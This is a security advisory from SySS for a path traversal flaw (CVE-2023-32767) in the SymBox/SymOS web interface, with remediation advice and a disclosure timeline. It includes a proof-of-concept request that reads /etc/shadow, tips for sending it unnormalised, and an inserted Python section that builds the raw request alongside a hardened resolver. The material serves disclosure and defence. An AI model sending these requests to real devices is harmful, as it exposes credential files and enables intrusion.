-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2023-014
Product: SymBox, SymOS
Manufacturer: Symcon GmbH
Affected Version(s): 5.5, 6.3 (i.e., before 2023-05-12)
Tested Version(s): 5.5
Vulnerability Type: Path Traversal (CWE-22)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2023-05-11
Solution Date: 2023-05-12
Public Disclosure: 2023-05-17
CVE Reference: CVE-2023-32767
Author of Advisory: Marc Gessler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

SymOS is the operating system developed for the SymBox appliance.
The manufacturer describes the product as follows (see [1]):

"The SymBox is our smart All-In-One solution. The integrated SymOS was
specially developed for IP-Symcon and handles the otherwise troublesome
system configuration. Thus, you can focus on the important part:
Setting up your SmartHome."

Due to insufficient validation of user-supplied input, its web
interface is vulnerable to path traversal attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

A path traversal vulnerability was discovered in the product's web
interface. The path of an HTTP request is not restricted to the web
root, so a specially crafted request can read files and directories
outside the web root and access sensitive information.

Furthermore, because the web interface runs with root privileges, the
traversal is not limited to world-readable files: files readable only
by root, for example "/etc/shadow", can be retrieved as well.
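The following Python example illustrates the two sides of the issue described above: the naive "web root + request path" resolution that lets "../" segments escape the web root, and the server-side validation recommended in the Solution section (canonicalize first, then enforce the web-root prefix). It also shows how the PoC request has to be sent so that the "../" segments reach the server unchanged. This is added example code written for this page, not SymOS/SymBox source, whose implementation the advisory does not show. The web root "/var/www/html", the host name "symbox.local" and the percent-encoded request variant are assumptions for illustration; only the literal "/../../../../../../../../../etc/shadow" request target is taken from the PoC.

```python
"""Path resolution as it fails in a traversal bug and as it should be done.

Added example, not SymOS/SymBox code. WEB_ROOT, the host name and the
URL-encoded request variant are assumptions; only POC_TARGET is taken
from the advisory's PoC.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed document root (hypothetical)

# Request target exactly as in the advisory's PoC.
POC_TARGET = "/../../../../../../../../../etc/shadow"


def request_path(request_target: str) -> str:
    """Strip the query string and percent-decode the origin-form target once."""
    return unquote(request_target.split("?", 1)[0])


def resolve_unsafe(request_target: str, web_root: str = WEB_ROOT) -> str:
    """Vulnerable pattern: web root + request path, handed straight to open().

    normpath() models what the kernel does with ".." when the file is opened:
    each ".." climbs one directory, so enough of them escape the web root.
    """
    return posixpath.normpath(web_root + request_path(request_target))


def resolve_safe(request_target: str, web_root: str = WEB_ROOT) -> Optional[str]:
    """Hardened resolver: canonicalize first, then enforce the web-root prefix.

    Returns the path to serve, or None when the request must be rejected.
    On a live system use os.path.realpath() instead of normpath() so that
    symbolic links inside the web root are resolved before the prefix check;
    normpath is used here so the example runs without the directory existing.
    """
    path = request_path(request_target)
    if "\x00" in path:  # a NUL byte would truncate the name in a C open()
        return None
    candidate = posixpath.normpath(posixpath.join(web_root, path.lstrip("/")))
    # commonpath() compares whole components, so "/var/www/html-private"
    # is rejected even though it shares a string prefix with the web root.
    if posixpath.commonpath([web_root, candidate]) != web_root:
        return None
    return candidate


def build_poc_request(host: str, target: str = POC_TARGET) -> bytes:
    """Raw HTTP/1.1 request bytes for the PoC, to be written to a plain socket.

    Sending it this way matters: browsers and most HTTP libraries collapse
    "../" segments client-side, so the server would never see the traversal.
    (curl preserves the path as given with --path-as-is.)
    """
    return (
        f"GET {target} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


if __name__ == "__main__":
    # Constructed request targets: the PoC, an encoded variant, a benign
    # request with a ".." that stays inside the root, and a NUL-byte attempt.
    for target in (POC_TARGET, "/%2e%2e/%2e%2e/%2e%2e/etc/shadow",
                   "/css/../index.html", "/index.html%00.png"):
        print(f"{target!r:45} unsafe -> {resolve_unsafe(target)!r:28} "
              f"safe -> {resolve_safe(target)!r}")
```

The prefix check is done with posixpath.commonpath rather than str.startswith so that a sibling directory whose name merely begins with the web root name cannot pass; the NUL check matters because the path eventually reaches a C-level open() that stops at the first NUL byte.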
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Request:

GET /../../../../../../../../../etc/shadow HTTP/1.1

Response:

HTTP/1.1 200 OK
Content-Type:text/html
X-Content-Length:109
Content-Length: 109
ETag:"abcdefghijklmnopqrtstuvwxyz"

root:$5$12345678$abcdefghijklmnopqrtstuvwxyz:10933:0:99999:7:::
avahi:*:::::::
dbus:*:::::::

Note that the "../" segments must reach the server unchanged: browsers
and most HTTP client libraries normalize them away before sending the
request, so the PoC has to be sent over a raw socket or with a client
that preserves the path as given (e.g. curl's "--path-as-is" option).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Validate all user-supplied path values on the server side: decode the
request path, canonicalize it (resolving "." and ".." segments as well
as symbolic links) and only serve the file if the canonical path still
lies inside the web root. Do not allow access to directories outside
the web root or to other sensitive files.

Additionally, check whether the web interface must be run with root
privileges at all. If these privileges are not required, run the web
interface as an unprivileged user, so that a file access flaw cannot
expose root-only files such as "/etc/shadow".

More information:
https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-05-09: Vulnerability discovered
2023-05-11: Vulnerability reported to manufacturer
2023-05-12: Patch released by manufacturer
2023-05-17: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Linux SymBox / SymOS
    https://www.symcon.de/en/product/symbox/
[2] SySS Security Advisory SYSS-2023-014
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-014.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Marc Gessler of SySS GmbH.
E-Mail: marc.gessler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/marc_gessler.asc
Key ID: 0x5077DCEB1C98D0A2
Key Fingerprint: 3F7B B558 6734 8FCF 25A0 F596 5077 DCEB 1C98 D0A2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEP3u1WGc0j88loPWWUHfc6xyY0KIFAmRnGtMACgkQUHfc6xyY
0KIFwBAAk+VHaB7Mk40rfa73eJ84UDGIV8aP98LxtHmI/TKblJMpXhBeSSNv3fLX
eM6z8XjzQ8sO4CcxlaaEAMY5g5KnKG0GrmIdERTFQvLcLrJrP8unnOFd7PGz9se5
40dwAkg6p4i6ORe15ROWJgs2V8tiYQ7eR5v+Y3Ez/1mXzeV9BjWh69AmBTJnrZdL
4oEGkIYhjno1LvDNX0mieG/YPZ4typBpuENSUGaPnOiTw0+qIubwv8d1c5Q64+QV
FjZFz+A/IlcaTpxHPjxCOw2taaKdV2CQqXK1aVsH6kWEEb/hPsGWcpq99lPrboam
vXZ+yes3Nd7KqrxTQ+j04HtnRfrLzzt8iNjYTklAF8WgQw+8WG4Wq9x9kc00XMDH
KFb6LqFe+t3X0NQXemsi+3oLVdZnKQSfnW162FsIO3bsznvinfkZDOZycMnRZb7G
CaLmKlzZ60jJLmkDCdWuoN55yt9WcHGFWcFJVX20ula1OtCn57hoVvD7HXAE0xdV
T5EDNOSsGJm209QJ20YWCtl5R7VtP4R4PpHnT3F8Ucqf+XFCqfSA7VQ4A4YsbZsB
JnZImc4ATA7MMxPV2UwbDFfaeFRib61bhZOG7Dih4RLDk5yGFgi1OQHWE9RZ4T7K
cle4aGLkxhTUW8AdzpvAIXGV2HMJo7mrSZcyLMjxkfW0yaS/Gok=
=oGdH
-----END PGP SIGNATURE-----